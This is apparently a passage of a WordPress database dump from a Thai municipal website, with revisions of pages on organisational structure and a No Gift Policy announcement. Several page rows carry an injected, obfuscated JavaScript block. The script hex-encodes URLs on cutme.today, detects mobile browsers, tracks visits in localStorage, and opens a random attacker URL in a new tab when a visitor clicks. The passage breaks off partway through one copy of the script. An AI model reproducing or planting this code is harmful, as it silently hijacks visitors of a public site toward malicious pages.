href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\">โครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":589,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/โครงสร้างบุคลากร-1.png\" alt=\"\" class=\"wp-image-589\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-05-23 16:03:53','2025-05-23 09:03:53','',546,'http://pakhaeng.ssk.in.th/?p=1286',0,'revision','',0),
(1288,1,'2025-06-09 13:21:27','2025-06-09 06:21:27','','ประกาศเจตนารมณ์','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%80%e0%b8%88%e0%b8%95%e0%b8%99%e0%b8%b2%e0%b8%a3%e0%b8%a1%e0%b8%93%e0%b9%8c-2','','','2025-06-09 13:21:27','2025-06-09 06:21:27','',859,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf',0,'attachment','application/pdf',0),
(1290,1,'2025-06-09 13:22:14','2025-06-09 06:22:14','','Is-It-a-Gift-Instagram-Post','','inherit','','closed','','is-it-a-gift-instagram-post-4','','','2025-06-09 13:22:14','2025-06-09 06:22:14','',859,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post.png',0,'attachment','image/png',0),
(1291,1,'2025-06-09 13:22:34','2025-06-09 06:22:34','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:22:34','2025-06-09 06:22:34','',859,'http://pakhaeng.ssk.in.th/?p=1291',0,'revision','',0),
(1292,1,'2025-06-09 13:22:37','2025-06-09 06:22:37','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_